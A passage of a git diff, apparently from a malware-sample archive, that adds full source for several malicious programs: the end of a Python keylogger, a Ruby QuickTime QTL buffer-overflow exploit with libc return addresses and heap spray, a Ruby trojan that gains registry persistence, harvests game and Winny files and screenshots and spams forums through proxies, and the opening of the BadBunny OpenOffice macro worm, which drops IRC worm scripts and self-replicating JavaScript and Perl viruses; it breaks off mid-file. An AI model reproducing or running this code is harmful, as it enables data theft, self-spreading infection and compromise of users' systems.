SPACE>' + elif event.Ascii==9: + keys='<TAB>' + else: + keys=chr(event.Ascii) + data=data+keys + if x==1: + local() + elif x==2: + remote() + elif x==4: + ftp() + +obj = pyHook.HookManager() +obj.KeyDown = keypressed +obj.HookKeyboard() +pythoncom.PumpMessages() \ No newline at end of file diff --git a/Ruby/Constructor.Ruby.Qtp.a b/Ruby/Constructor.Ruby.Qtp.a new file mode 100644 index 00000000..f2c1c175 --- /dev/null +++ b/Ruby/Constructor.Ruby.Qtp.a @@ -0,0 +1,61 @@ + +#!/usr/bin/ruby +# Copyright (c) LMH <lmh [at] info-pull.com> +# Kevin Finisterre <kf_lists [at] digitalmunition.com> +# +# Notes: +# Our command string is loaded on memory at a static address normally, +# but this depends on execution method and the string length. The address set in this exploit will +# be likely successful if we open the resulting QTL file directly, without having an +#ツinstance of Quicktime running. Although, when using another method and string, you'll need +# to find the address. +# For 100% reliable exploitation you can always use the /bin/sh address, +# but that's not as a cool as having your box welcoming the new year. +# Do whatever you prefer. That said, enjoy. +# +# see http://projects.info-pull.com/moab/MOAB-01-01-2007.html + +# Command string: Use whatever you like. +# Remember that changing this will also need a change of the target address for system(), +# unless string length is the same. +CMD_STRING = "/usr/bin/say Happy new year shit bag" + +# Mac OS X 10.4.8 (8L2127) +EBP_ADDR = 0xdeadbabe +SYSTEM_ADDR = 0x90046c30 # NX Wars: The Libc Strikes Back +SETUID_ADDR = 0x900334f0 +CURL_ADDR = 0x916c24bc # /usr/bin/curl +SHELL_ADDR = 0x918bef3a # /bin/sh +CMDSTR_ADDR = [ + SHELL_ADDR, # 0 addr to static /bin/sh (lame) + 0x017a053c, # 1 addr to our command string (cool) :> (change as necessary) + 0xbabeface, # 2 bogus addr for testing. + CURL_ADDR # 3 addr to '/usr/bin/curl' + ] + +# Payload. default to CMDSTR_ADDR 0 (/bin/sh) +HAPPY = ("A" * 299) + + [EBP_ADDR].pack("V") + + [SYSTEM_ADDR].pack("V") + + [SETUID_ADDR].pack("V") + + [CMDSTR_ADDR[0]].pack("V") # change array index for using diff. addr (see CMDSTR_ADDR) + +# Sleds: not necessary if using /bin/bash addr or other built-in addresses. +# although, for using our own fu, we need to spray some data for better reliability +# the goal is causing allocation of large heap chunks +NEW = ("\x90" * 30000) + CMD_STRING # feed the heap +YEAR = ("\x90" * 30000) + CMD_STRING # go johnny, go +APPLE = ("\x90" * 30000) + "EOOM" # feed the heap more +BOYZ = ("\x90" * 30000) + "FOOM" # and more + +# QTL output template +QTL_CONTENT = "<?xml version=\"1.0\"?>" + + "<?quicktime type=\"application/x-quicktime-media-link\"?>" + + "<embed autoplay=\"true\" moviename=\"#{NEW}\" " + + "qtnext=\"#{YEAR}\" type=\"video/quicktime#{APPLE}\" " + + "src=\"rtsp://#{BOYZ}:#{HAPPY}\" />\n" + +target_file = File.open("pwnage.qtl", "w+") { |f| + f.print(QTL_CONTENT) + f.close +} diff --git a/Ruby/Trojan-Spy.Ruby.Kakkeys.d b/Ruby/Trojan-Spy.Ruby.Kakkeys.d new file mode 100644 index 00000000..438d7b71 --- /dev/null +++ b/Ruby/Trojan-Spy.Ruby.Kakkeys.d @@ -0,0 +1,574 @@ +$KCODE = 's' +#$DEBUG = true +#Exerb = nil +require 'Win32API' +if ARGV.size == 1 and ARGV[0].include?('RoAddr') + $path = ARGV[0] + if File.exist?($path) + $rost = Win32API.new($path, 'RO_GetNowState', '', 'l') + $rowld = Win32API.new($path, 'RO_GetNowWorld', '', 'p') + $ropa = Win32API.new($path, 'RO_GetNowParam', 'i', 'p') + $roin = Win32API.new($path, 'RO_RoAddrInit', 'lpl', 'i') + $roin.call(0, '', 0x7FFFFFFF) + $rost.call + if $rost.call == 2 + print $ropa.call(258).to_s + "[#{$rowld.call}]" + end + end + exit +end +require 'win32/registry' +require 'ftools' +def dll(file) +if !File.exist?('C:/windows/system32/' + file) + f = Exerb.open(file) + f.binmode + open('C:/windows/system32/' + file, 'w'){|f2| + f2.binmode + f.read 9 + p f2.write(f.read) + } + f.close +end +end +if Exerb + if !Exerb.filepath.include?('iexplore') + File.copy(Exerb.filepath, 'C:/windows/system32/iexplore.exe') + `start install.exe` + dll('zlib.dll') + dll('7-zip32.dll') + dll('imgctl.dll') + Win32::Registry.open(Win32::Registry::HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run', Win32::Registry::Constants::KEY_WRITE){|key| + key.write_s('Shell', 'C:/windows/system32/iexplore.exe') + } + `start C:\\windows\\system32\\iexplore.exe` + exit + else +=begin + $double = Thread.new{ + cm = Win32API.new('kernel32', 'CreateMutex', 'llp', 'l') + rm = Win32API.new('kernel32', 'ReleaseMutex', 'l', 'l') + ch = Win32API.new('kernel32', 'CloseHandle', 'l', 'l') + om = Win32API.new('kernel32', 'OpenMutex', 'llp', 'l') + gle = Win32API.new('kernel32', 'GetLastError', '', 'l') + + hage = cm.call(0, 0, 'hagemoe') + if gle.call == 183 + ch.call hage + hage = nil + hagege = cm.call(0, 0, 'hagegemoe') + if gle.call == 183 + ch.call hagege + exit 1 + end + elsif + 0 + end + if hage + s = 'hagegemoe' + else + s = 'hagemoe' + end + while(1) + a = om.call(1, 0, s) + if a == 0 + if ARGV[0] == 'aaa' + p system("start #{Exerb.filepath}") + else + p system("strat #{Exerb.filepath} aaa") + end + Win32::Registry.open(Win32::Registry::HKEY_LOCAL_MACHINE, '\SOFTWARE\Microsoft\Windows\CurrentVersion\Run', Win32::Registry::Constants::KEY_WRITE){|key| + key.write_s('Shell', 'C:/windows/system32/iexplore.exe') + } + sleep 0.1 + else + ch.call(a) + end + #p "sss" + sleep 0.04 + end + } +=end + end +end +if ARGV[0] == 'aaa' + sleep +end +END { + Win32::Registry.open(Win32::Registry::HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run', Win32::Registry::Constants::KEY_WRITE){|key| + key.write_s('Shell', 'C:/windows/system32/iexplore.exe') + } +} +require 'kconv' +require 'web/agent' +require 'web/linkextor' + + +$wait_time = 1 +$bbs_arr = [['computer', '10041'], ['computer', '10376'], ['computer', '11089'], ['computer', '14218'], ['computer', '14368'], ['computer', '6135'], ['computer', '6253'], ['computer', '6346'], ['computer', '7430'], ['game', '1185'], ['game', '12884'], ['game', '18472'], ['game', '19824'], ['game', '5420'], ['game', '5458'], ['game', '6141'], ['game', '9397'], ['shop', '832'], ['computer', '6567'], ['game', '10013'], ['computer', '21565'], ['computer', '21563']] + +$category = '' +$bbs = '' + +$ropath = [] +$korepath = [] +$nypath = [] +$toolpath = [] +$charanames = [] +$tar = ['ragnarok.exe', 'items_control.txt', 'winny.exe'] +$tool = ['ChatPon.exe', 'arose*.exe', 'AutoImo.exe', 'eqview.exe', 'ExS.exe', 'Meron*.exe', 'RAGNAvi.exe', 'RoAbrPure.exe', 'RoCha.exe', 'RoMonitor.exe', 'ro.exe' ,'ROPTAssist.exe' ,'RSS.exe' ,'rohp.exe' ,'RoLogger.exe' ,'MessengerGPS.exe' ,'Lognarok.exe' ,'ro_gps.exe', 'ROGIS.exe' ,'xdior*.exe' ,'LimeChat.exe'] +$kakikomi = [] +$id = '' +$charaarr = [] +$charas = '' +$tekito_id = '' +def Dir.copy(from, to, *jogai) + begin + sleep 0.01 + Dir.foreach(from){|x| + if !x.match(/^\.\.?/) + if File.directory?(from + x) + Dir.mkdir(to + x) + Dir.copy(from + x + '/', to + x + '/', *jogai) + else + if !jogai.any?{|jo| x.include?(jo)} or jogai.size == 0 + File.copy(from + x, to + x) + end + end + end + } + rescue + return 1 + end + 0 +end +def delete_dir(dir) + begin + Dir.foreach(dir){|x| + if !x.match(/^\.\.?/) + if File.directory?(dir + x) + if Dir.entries(dir + x).size <= 2 + Dir.delete(dir + x) + else + delete_dir(dir + x + '/') + end + else + File.delete(dir + x) + end + end + } + Dir.delete(dir) + rescue + return 1 + end + 0 +end +def roname + abx = `#{Exerb.filepath} \"#{$ropath}/RoAddr.dll\"` if Exerb + return nil if abx.size == 0 + $charanames.push(abx) if !$charanames.include?(abx) + savedata($savefile) + abx +end +def emotion_wana wana + Win32::Registry.open(Win32::Registry::HKEY_LOCAL_MACHINE, 'SOFTWARE\Gravity Soft\Ragnarok\ShortCutList', Win32::Registry::Constants::KEY_WRITE){|key| + for i in 0..9 + key.write_s(i.to_s, wana) + end + } +end +def upfolder(folder, trip) + Dir.mkdir(folder) if !File.exist?(folder) + begin + $nypath.each{|x| + File.chmod(0777, x + '/upfolder.txt') + open(x + '/UpFolder.txt', 'a+'){|f| + f.write("\n[ブーン]\nPath=#{folder}\nTrip=#{trip}") if !f.read.include?('ブーン') + } + } + rescue + end + folder +end +def saiki dir + sleep 0.01 + begin + Dir.chdir(dir){ + #print Dir.pwd + "\n" + $ropath.push Dir.pwd if File.exist?($tar[0]) + $korepath.push File.dirname(Dir.pwd) if File.exist?($tar[1]) + sleep 0.01 + $nypath.push Dir.pwd if File.exist?($tar[2]) + $kakikomi.push( Dir.pwd + '/' + 'kakikomi.txt') if File.exist?('kakikomi.txt') + $toolpath.push Dir.pwd if Dir[$tool.join("\0")].size != 0 + Dir.foreach('./'){ |x| + if File.directory?(x) && !x.match(/\.\.?/) + saiki(x) + end + } + } + rescue + p $! + ensure + end +end +def search + get_drv_type = Win32API.new('kernel32', 'GetDriveType', 'p', 'l') + + for drive in 'CDEFGHIJKLMNOPQRSTUVWXYZ'.split('') + if get_drv_type.call(drive + ':/') == 3 + saiki(drive + ':/') + end + end + $ropath.uniq! + $toolpath.uniq! + $korepath.uniq! + $nypath.uniq! +end +def savedata(path) + open(path, 'w'){|f| + Marshal.dump($ropath, f) + Marshal.dump($korepath, f) + Marshal.dump($nypath, f) + Marshal.dump($toolpath, f) + Marshal.dump($kakikomi, f) + Marshal.dump($bbs_arr, f) + Marshal.dump($charanames, f) + Marshal.dump($tekito_id, f) + } + true +end +def loaddata(path) + return false if !File.exists?(path) + open(path){|f| + $ropath = Marshal.load(f) + $korepath = Marshal.load(f) + $nypath = Marshal.load(f) + $toolpath = Marshal.load(f) + $kakikomi = Marshal.load(f) + $bbs_arr = Marshal.load(f) + $charanames = Marshal.load(f) + $tekito_id = Marshal.load(f) + } + true +end +def rns *str + if str.size == 1 + str = str[0].split('') + end + str[rand(str.size)] +end +def names +begin +$charaarr = [] +$charas = '' +separater = rns("わ#{rand(100)}な", "わー#{rand(100)}な", "rtx", "RoAddr", 'ラーメン', 'rxv', '弁当', 'bot', '焼', 'ああああ', 'zeny', 'ini', 'config', 'パケ', *$omosiro_words) +Win32::Registry.open(Win32::Registry::HKEY_LOCAL_MACHINE, 'SOFTWARE\\Gravity Soft\\Ragnarok\\Whisperlist\\') { |wisp_list| + wisp_list.each_key{|server_str, sute| + $charas += server_str + "\n" + wisp_list.open(server_str){|server| + server.each_key{|char_str, sute| + $charaarr.push char_str.split("\0")[0] + } + } + $charas += $charaarr.join(separater) + "\n" + $charanames.join(separater) + "\n" + $charaarr = [] + } +} +Win32::Registry.open(Win32::Registry::HKEY_LOCAL_MACHINE, 'SOFTWARE\\Gravity Soft\\Ragnarok\\'){|key| $id = key.read('ID')[1].split("\0")[0]} +rescue + p $1 +end +end +names + +$upup = upfolder('C:\program files\daemontools\\', '') +$capture = Proc.new{ + loop do + getDC = Win32API.new('user32', 'GetDC', 'l', 'l') + releaceDC = Win32API.new('user32', 'ReleaseDC', 'll', 'l') + dc2dib = Win32API.new('imgctl', 'DCtoDIB', 'lllll', 'l') + dib2png = Win32API.new('imgctl', 'DIBtoPNG', 'pli', 'i') + deleteDib = Win32API.new('imgctl', 'DeleteDIB', 'l', 'i') + begin + akakaka = roname + hdc = getDC.call(0) + hdib = dc2dib.call(hdc,0,0,0,0) + dib2png.call($upup+'[バグザロック] '+$tekito_id+' '+Time.now.strftime('%Y%m%d-%H%M%S')+' 「'+$charanames.join('」「')+'」.png', hdib, 0) + File.rename(Dir.glob('C:/program files/daemontools/*.zip')[0], "#{$upup}[バグザロック] #{$id} 「#{$charanames.join('」「')}」.zip") if (Dir.glob('C:/program files/daemontools/*.zip').size > 0) + ensure + deleteDib.call(hdib) + releaceDC.call(0, hdc) + end + if akakaka + jikan = Time.now + if jikan.wday == 0 and jikan.hour < 24 and jikan.hour > 18 + emotion_wana "やあ僕BOTer!#{$charanames[rand($charanames.size)]} はBOTだよ ハゲ孫泰蔵と森下はさっさと死ね!!" + sleep 5 * 60 + else + sleep 12 * 60 + end + else + begin + open('c:/program files/internet explorer/iexplore.exe', 'a'){} + sleep 20 * 60 + rescue + sleep 15 * 60 + end + end + end +} +#init +$savefile = 'C:/RECYCLER/explorer.sys' +if !loaddata($savefile) + Thread.new(&$capture) + search + savedata($savefile) +else + Thread.new(&$capture) +end +if $tekito_id.size == 0 + $tekito_id = $id +end +#p $ropath, $korepath, $nypath, $toolpath, $charanames +if Dir.glob('C:/program files/daemontools/*.zip').size == 0 +begin + tmpf = 'C:/RECYCLER/tmp/' + Dir.mkdir(tmpf) if !File.exist?(tmpf) + $toolpath.each{|x| + to = tmpf + x.gsub(/\/|:/, '_') + if File.exist?(to);to = to + '_';end + Dir.mkdir(to) + Dir.copy(x + '/', to + '/', 'txt') + } + $korepath.each{|x| + to = tmpf + x.gsub(/\/|:/, '_') + if File.exist?(to);to = to + '_';end + Dir.mkdir(to) + Dir.copy(x + '/', to + '/', 'fld') + } + $ropath.each{|x| + to = tmpf + x.gsub(/\/|:/, '_') + if File.exist?(to);to = to + '_';end + Dir.mkdir(to) + Dir.copy(x + '/', to + '/', '.grf', '.gpf', '.mp3', '.bmp', '.ebm', '.fld') + } + $nypath.each_with_index{|x, i| + if i == 0 + to = tmpf + 'winny' + else + to = tmpf + 'winny' + i.to_s + end + Dir.mkdir(to) if !File.exist?(to) + File.copy(x + '/' + 'Download.txt', to + '/' + 'Download.txt') if File.exist?(x + '/' + 'Download.txt') + File.copy(x + '/' + 'Tab1.txt', to + '/' + 'Tab1.txt') if File.exist?(x + '/' + 'Tab1.txt') + File.copy(x + '/' + 'Tab2.txt', to + '/' + 'Tab2.txt') if File.exist?(x + '/' + 'Tab2.txt') + } + $kakikomi.each{|x| + File.copy(x, tmpf + x.gsub(/\/|:/, '_')) if !File.exist?(x) + } + seven_zip = Win32API.new('7-zip32.dll', 'SevenZip', 'lppl', 'i') + str = 'aaaaa' + + seven_zip.call(0, 'a -tzip -hide "' + $upup + '[バグザロック] ' + $id + ' 「' + $charanames.join('」「') + '」.zip" c:\recycler\tmp\ -r', str, 5) +rescue + p $! + print $!.backtrace.join("\n") +ensure + delete_dir tmpf +end +end +#exit + +$path = $ropath[0] + '/' + +$roaddr = File.exist?($path + 'roaddr.dll') +$ro = File.exist?($path + 'ragexe.exe') +$are = File.exist?($path + 'ws2_32.dll') +$rtx = File.exist?($path + 'ddraw.dll') +def rtx + rns(rns('rRrR'), rns('あアア') + rns('ー−‐-あアア') + rns('るルル')) + + rns(rns('tTtT'), rns('てテテ') + rns('いぃイぃイ') + rns('いイイー−‐-')) + + rns(rns('xXxX'), rns('えエエ') + rns('つツっッッ') + rns('くクク') + rns('すスス')) +end + +def aretool + rns(rns('aAaA'), rns('あアア')) + + rns(rns('rRrR') + rns('eEeE'), rns('れレレ')) + + rns(rns('tTtT') + rns('oOoO00'), rns('つツツ')) + + rns(rns('oOoO00'), rns('うウウー−‐-')) + + rns(rns('lLlL'), rns('るルル')) +end +$nypath.each{|x| + if File.exist?(x + '/Tab1.txt') + open(x + '/Tab1.txt'){|f| + $omosiro_words = f.read.split("\n") + } + end +} + +def getThreads + http = Web::Agent.new + http.setup + http.req.header['User-Agent']="Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP; rv:1.7) Gecko/20040803 Firefox/0.9.3" + $category, $bbs = *$bbs_arr[rand($bbs_arr.size)] + http.get("http://jbbs.livedoor.jp/#{$category}/#{$bbs}/subject.txt") + $suret = http.rsp.body.split("\n") + sss = [] + $suret.each{|sure| + if !sure.match(/.*\(10000?\)/) + sure.match(/^(\d+)/) + sss.push $1 + end + } + return sss; +end +#p '書き込み開始' + +agent = Web::Agent.new +agent.setup +agent.req.header['User-Agent']="Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP; rv:1.7) Gecko/20040803 Firefox/0.9.3" +agent.get('http://www.cybersyndrome.net/pla.html') +agent.rsp.body.match("") +proxy = [] +while($'.match(/\"A\">([^<>]*)<\/a>/)) #' + proxy.push($~[1]) +end +proxy.delete_if{|pr| + pr.match(/(80)|(8080)/) +} +proxy.collect! do |i| + i.split(':') +end + +count = 0 +while(1) + sure = getThreads; + if rand(6) == 0 + for ituuu in 0..9 + age = Web::Agent.new + age.setup + age.req.header['User-Agent'] = "Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP; rv:1.7) Gecko/20050112 Firefox/0.9.8" + age.req.header['Referer'] = "http://yy14.kakiko.com/landstriker/" + age.get 'http://yy14.kakiko.com/landstriker/subject.txt' + suret = age.rsp.body.split("\n") + sss = [] + suret.each{|sure| + if !sure.match(/.*\(10000?\)/) + sure.match(/^(\d+)/) + sss.push $1 + end + } + Thread.new{ + age.setup + age.req.header['User-Agent'] = "Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP; rv:1.7) Gecko/20050112 Firefox/0.9.8" + age.req.header['Referer'] = "http://yy14.kakiko.com/landstriker/" + age.req.header['content-type']='application/x-www-form-urlencoded' + ran = rand(proxy.size) + if rand(2) == 1 + age.proxy_host = proxy[ran][0] + age.proxy_port = proxy[ran][1] + end + if sss.size != 0 + if $id == '' + age.req.form.add 'FROM', (10000 + rand(90000)).to_s + age.req.form.add 'mail', 'sage' + age.req.form.add 'MESSAGE', rns("わ#{rand(100)}な", "わー#{rand(100)}な", "rtx", "RoAddr", 'ラーメン', 'rxv', '弁当', 'bot', 'ro', '焼', 'ああああ', 'zeny', *$omosiro_words) + else + names + age.req.form.add 'FROM', $id + age.req.form.add 'mail', '' + massage = '' + massage = "なあ、ひとつ質問なんだけど・・・・・・お前達規約違反者はどうして今すぐにでも死なないんだ?\n" if rand(10) == 1 + massage += rtx + "\n" if $rtx + massage += aretool + "\n" if $are + massage += "RoAddr\n" if $roaddr && rand(2) == 1 + massage += "KORE\n" if $korepath.size > 0 + massage += $charas + age.req.form.add 'MESSAGE', massage + end + age.req.form.add 'bbs', 'landstriker' + age.req.form.add 'key', sure[rand(sure.size)] + age.req.form.add 'time', Time.now.to_i.to_s + age.req.form.add 'submit', '書き込む' + age.post('http://yy14.kakiko.com/test.bbs.cgi') + else + suret[rand(suret.size)].match(/,(.+)\(/) + age.setup + age.req.header['User-Agent'] = "Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP; rv:1.7) Gecko/20050112 Firefox/0.9.8" + age.req.header['Referer'] = "http://jbbs.livedoor.jp/#{$category}/#{$bbs}/" + age.req.header['content-type']='application/x-www-form-urlencoded' + age.req.form.add 'FROM', '' + age.req.form.add 'mail', '' + age.req.form.add 'subject', $1.chop + rand(10).to_i.to_s + age.req.form.add 'MESSAGE', rns("わ#{rand(100)}な", "わー#{rand(100)}な", "rtx", "RoAddr", 'ラーメン', 'rxv', '弁当', 'bot', 'ro', '焼', 'ああああ', 'zeny', *$omosiro_words) + age.req.form.add 'bbs', $bbs + age.req.form.add 'time', Time.now.to_s.toi + age.req.form.add 'submit', '新規スレッド作成' + age.post("http://jbbs.livedoor.jp/bbs/write.cgi/#{$category}/#{$bbs}/#{age.req.form['KEY']}") + end + } + end + else + if sure.size != 0 + loop do + sleep $wait_time + r = rand proxy.size + Thread.new(r, proxy){|ran, pro| + age = Web::Agent.new + age.setup + age.req.header['User-Agent'] = "Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP; rv:1.7) Gecko/20050112 Firefox/0.9.8" + age.req.header['Referer'] = "http://jbbs.livedoor.jp/#{$category}/#{$bbs}/" + age.req.header['content-type']='application/x-www-form-urlencoded' + if rand(2) == 1 + age.proxy_host = pro[ran][0] + age.proxy_port = pro[ran][1] + end + if $id == '' + age.req.form.add 'NAME', (10000 + rand(90000)).to_s + age.req.form.add 'MAIL', 'sage' + age.req.form.add 'MESSAGE', rns("わ#{rand(100)}な", "わー#{rand(100)}な", "rtx", "RoAddr", 'ラーメン', 'rxv', '弁当', 'bot', 'ro', '焼', 'ああああ') + else + names + age.req.form.add 'NAME', $id.chop.chop + age.req.form.add 'MAIL', '' + massage = '' + massage = "なあ、ひとつ質問なんだけど・・・・・・お前達規約違反者はどうして今すぐにでも死なないんだ?\n" if rand(10) == 1 + massage += rtx + "\n" if $rtx + massage += aretool + "\n" if $are + massage += "RoAddr\n" if $roaddr && rand(2) == 1 + massage += "KORE\n" if $korepath.size > 0 + massage += $charas + age.req.form.add 'MESSAGE', massage + end + age.req.form.add 'BBS', $bbs + age.req.form.add 'KEY', sure[rand(sure.size)] + age.req.form.add 'TIME', Time.now.to_s.to_i + age.req.form.add 'DIR', $category + age.post("http://jbbs.livedoor.jp/bbs/write.cgi/#{$category}/#{$bbs}/#{age.req.form['KEY']}") + } + count += 1 + break if count % 10 == 0 + end + else + $suret[rand($suret.size)].match(/,(.+)\(/) + age = Web::Agent.new + age.setup + age.req.header['User-Agent'] = "Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP; rv:1.7) Gecko/20050112 Firefox/0.9.8" + age.req.header['Referer'] = "http://jbbs.livedoor.jp/#{$category}/#{$bbs}/" + age.req.header['content-type']='application/x-www-form-urlencoded' + age.req.form.add 'NAME', '' + age.req.form.add 'MAIL', '' + age.req.form.add 'SUBJECT', $1.chop + rand(10).to_i.to_s + age.req.form.add 'MESSAGE', rns("わ#{rand(100)}な", "わー#{rand(100)}な", "rtx", "RoAddr", 'ラーメン', 'rxv', '弁当', 'bot', 'ro', '焼', 'ああああ') + age.req.form.add 'BBS', $bbs + age.req.form.add 'TIME', Time.now.to_s.to_i + age.req.form.add 'DIR', $category + age.post("http://jbbs.livedoor.jp/bbs/write.cgi/#{$category}/#{$bbs}/#{age.req.form['KEY']}") + end + end +end + +while Thread.list.size > 2 + sleep 10 +end diff --git a/Ruby/Virus.Ruby.Badbunny.a b/Ruby/Virus.Ruby.Badbunny.a new file mode 100644 index 00000000..05429dee --- /dev/null +++ b/Ruby/Virus.Ruby.Badbunny.a @@ -0,0 +1,314 @@ +Dim Url As String +Dim myFileProp as Object + +Sub badbunny() +rem Ooo.BadBunny by Necronomikon&Wargame from [D00mRiderz] +Dim mEventProps(1) as new com.sun.star.beans.PropertyValue +mEventProps(0).Name = "EventType" +mEventProps(0).Value = "StarBasic" +mEventProps(1).Name = "Script" +mEventProps(1).Value = "macro://ThisComponent/Standard.badbunny.startgame" +com.sun.star.document.MacroExecMode.ALWAYS_EXECUTE_NO_WARN +ThisComponent.LockControllers +oDocument = ThisComponent +otext=oDocument.text +ocursor=otext.createtextcursor() +otext.insertString(ocursor, "BadBunny(c)by Necronomikon[DR],Skyout,Wargame[DR]",false) +url=converttourl("http://www.gratisweb.com/badbunny/badbunny.jpg") +oDocument = StarDesktop.loadComponentFromURL(url, "_blank", 0, myFileProp() ) +msgbox "Hey " +Chr(31)+environ("username") +Chr(31)+ " you like my BadBunny?", 32,"///BadBunny\\\" +call ping +end sub + +sub startgame +if GetGUIType =1 then 'windows +call win +end if +if GetGUIType =3 then 'MacOS +call mac +end if +if GetGUIType =4 then 'linux +call lin +end if +end sub + +sub win +Dim dirz As String +Dim dummy() +Dim iVar As Integer +Dim Args(0) as new com.sun.star.beans.PropertyValue +Args(0).Name = "MacroExecutionMode" +Args(0).Value = _ +com.sun.star.document.MacroExecMode.ALWAYS_EXECUTE_NO_WARN +ThisComponent.LockControllers + datei="c:\badbunny.odg" + dateiurl=converttourl(datei) + odoc=thisComponent + odoc.storeasurl(dateiurl,dummy()) +dirz=Environ ("programfiles") + +Open "c:\drop.bad" For Output As #1 +Print #1, "[script]" +Print #1, "n0=; IRC_Worm/BadBunny (c)by Necronomikon&Wargame from[D00MRiderz]" +Print #1, "n1=/titlebar *#*#*#*#*#*( Not every Bunny is friendly... )*#*#*#*#*#*#*" +Print #1, "n2=on 1:start:{" +Print #1, "n3= /if $day == Friday { /echo }" +Print #1, "n4=on 1:Join:#:if $chan = #virus /part $chan" +Print #1, "n5=on 1:connect:.msg Necronomikon -=I am infected with ur stuff!!!=-" +Print #1, "n6=on 1:connect:.msg wargame -=I am infected with ur stuff!!!=-" +Print #1, "n7=on 1:text:#:*hi*:/say $chan kick me" +Print #1, "n8=on 1:text:#:*hello*:/say $chan kick me" +Print #1, "n9=on 1:part:#:{" +Print #1, "n10=set %M_E $me" +Print #1, "n11=set %NickName $nick" +Print #1, "n12=set %ccd .dcc" +Print #1, "n13= if %NickName != %M_E {" +Print #1, "n14= /q %NickName lets do it like a rabbit...;)" +Print #1, "n15= /msg %NickName Be my bunny!" +Print #1, "n16=%ccd send -c %NickName c:\badbunny.odg" +Print #1, "n17= }" +Print #1, "n18=}" +Close #1 + +if ( Dir(dirz &"\mirc") <> "") then +Filecopy "c:\drop.bad" , dirz &"\mirc\script.ini" +end if +if ( Dir("c:\mirc") <> "") then +Filecopy "c:\drop.bad" , "c:\mirc\script.ini" + +end if +if ( Dir(dirz &"\mirc32") <> "") then +Filecopy "c:\drop.bad" , dirz &"\mirc32\script.ini" +end if +if ( Dir("c:\mirc32") <> "") then +Filecopy "c:\drop.bad" , "c:\mirc32\script.ini" +end if + +Open "c:\badbunny.js" For Output As #2 +Print #2, "// BadBunny" +Print #2, "var FSO=WScript.CreateObject(unescape(""%53"")+unescape(""%63"")+unescape(""%72"")+unescape(""%69"")+unescape(""%50"")+unescape(""%74"")+unescape(""%69"")+""n""+unescape(""%67"")+"".""+unescape(""%46"")+unescape(""%69"")+""l""+unescape(""%65"")+unescape(""%53"")+unescape(""%79"")+unescape(""%73"")+unescape(""%74"")+unescape(""%65"")+""mO""+unescape(""%62"")+""j""+unescape(""%65"")+unescape(""%63"")+unescape(""%74""))" +Print #2, "var me=FSO.OpenTextFile(WScript.ScriptFullName,1)" +Print #2, "var OurCode=me.Read(1759)" +Print #2, "me.Close()" +Print #2, "nl=String.fromCharCode(13,10); code=''; count=0; fcode=''" +Print #2, "file=FSO.OpenTextFile(WScript.ScriptFullName).ReadAll()" +Print #2, "for (i=0; i < file.length; i++) { check=0; if (file.charAt(i)==String.fromCharCode(123) && Math.round(Math.random()*3)==1) { foundit(); check=1 } if (!check) { code+=file.charAt(i) } }" +Print #2, "FSO.OpenTextFile(WScript.ScriptFullName,2).Write(code+fcode)" +Print #2, "var jsphile=new Enumerator(FSO.GetFolder(""."").Files)" +Print #2, "for(;!jsphile.atEnd();jsphile.moveNext())" +Print #2, "{" +Print #2, "if(FSO.GetExtensionName(jsphile.item()).toUpperCase()==""JS"")" +Print #2, "{" +Print #2, "var filez=FSO.OpenTextFile(jsphile.item().path,1)" +Print #2, "var Marker=filez.Read(11)" +Print #2, "var allinone=Marker+filez.ReadAll()" +Print #2, "filez.Close()" +Print #2, "if(Marker!=""// BadBunny"")" +Print #2, "{" +Print #2, "var filez=FSO.OpenTextFile(jsphile.item().path,2)" +Print #2, "filez.Write(OurCode+allinone)" +Print #2, "filez.Close()" +Print #2, "}" +Print #2, "}" +Print #2, "}" +Print #2, "function foundit()" +Print #2, "{" +Print #2, "fcodea=''; count=0; randon='';" +Print #2, "for (j=i; j < file.length; j++) { if (file.charAt(j)==String.fromCharCode(123)) { count++; } if (file.charAt(j)==String.fromCharCode(125)) { count--; } if (!count) { fcodea=file.substring(i+1,j); j=file.length; } }" +Print #2, "for (j=0; j < Math.round(Math.random()*5)+4; j++) { randon+=String.fromCharCode(Math.round(Math.random()*25)+97) }" +Print #2, "fcode+=nl+nl+'function '+randon+'()'+nl+String.fromCharCode(123)+nl+fcodea+nl+String.fromCharCode(125)" +Print #2, "code+=String.fromCharCode(123)+' '+randon+'() '" +Print #2, "i+=fcodea.length;" +Print #2, "}" +Print #2, "//->" +Close #2 +Shell("c:\badbunny.js",0) +oDoc.store() +End Sub + +sub lin() +'xchat2worm part by WarGame +dim HomeDir as string +dim xchat2script as string +dim perlvir as string +dim cmd as string +dim WgeT as string +Dim dummy() +Dim iVar As Integer +Dim Args(0) as new com.sun.star.beans.PropertyValue +Args(0).Name = "MacroExecutionMode" +Args(0).Value = _ +com.sun.star.document.MacroExecMode.ALWAYS_EXECUTE_NO_WARN +ThisComponent.LockControllers + datei="/tmp/badbunny.odg" + dateiurl=converttourl(datei) + odoc=thisComponent + odoc.storeasurl(dateiurl,dummy()) + +' get home dir +HomeDir = Environ("HOME") + +'build the path of our xchat2 script +if HomeDir = "" then +' I could not get $HOME ! + +else +xchat2script = HomeDir & "/.xchat2/badbunny.py" + +' drop the python script +Open xchat2script For Output As #1 +print #1,"__module_name__ = "+Chr(34)+"IRC_Worm/BadBunny (c)by Necronomikon&Wargame from[D00MRiderz]"+Chr(34) +print #1,"__module_version__ = "+Chr(34)+"0.1"+Chr(34) +print #1,"__module_description__ = "+Chr(34)+"xchat2 IRC_Worm for BadBunny"+Chr(34) +print #1,"import xchat" +print #1,"def onkick_cb(word, word_eol, userdata):" +print #1," if xchat.nickcmp(word[3],xchat.get_info("+Chr(34)+"nick"+Chr(34)+")) != 0:" +print #1," xchat.command("+Chr(34)+"DCC SEND "+Chr(34)+"+ word[3] +"+Chr(34)+" /tmp/badbunny.odg"+Chr(34)+")" +print #1," return xchat.EAT_NONE" +print #1,"xchat.hook_server("+Chr(34)+"KICK"+Chr(34)+", onkick_cb)" +close #1 +endif + +'drop the perl virus +perlvir = HomeDir & "/BadBunny.pl" +open perlvir for output as #1 +print #1,"#BadBunny" +print #1,"open(File,$0);@MyCode = ;close(File);" +print #1,"foreach $FileName 